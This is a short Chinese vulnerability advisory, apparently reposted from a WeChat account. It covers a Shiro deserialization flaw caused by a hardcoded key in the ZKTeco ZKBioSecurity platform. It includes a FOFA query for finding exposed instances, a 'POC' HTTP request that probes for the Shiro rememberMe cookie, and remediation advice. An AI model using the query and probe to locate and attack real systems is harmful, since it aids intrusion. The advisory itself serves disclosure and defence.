Zkteco百傲瑞达安防管理系统平台 Shiro反序列化漏洞复现

2024年11月5日19:26:42评论69 views字数 529阅读1分45秒阅读模式

一、漏洞介绍

Zkteco 百傲瑞达安防管理系统平台存在 shiro 反序列化漏洞，该漏洞源于软件存在硬编码的 shiro-key，攻击者可利用该 key 生成恶意的序列化数据，在服务器上执行任意代码，执行系统命令、或打入内存马等，获取服务器权限。

二、漏洞复现

FOFA：title=="ZKBioSecurity" && body="Automatic login within two weeks"

POC

GET / HTTP/1.1

Host: 0.0.0.0

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3)

AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

Cookie: rememberMe=1

Accept-Encoding: gzip

三、修复建议

1、官方已修复该漏洞，请用户联系厂商修复漏洞:https://www.zkteco.com。

2、通过防火墙等安全设备设置访问策略，设置白名单访问。

3、如非必要，禁止公网访问该系统。

原文始发于微信公众号（河北镌远网络科技有限公司）：Zkteco百傲瑞达安防管理系统平台 Shiro反序列化漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

Vite import存在任意文件读取漏洞CVE-2025-31125 附POC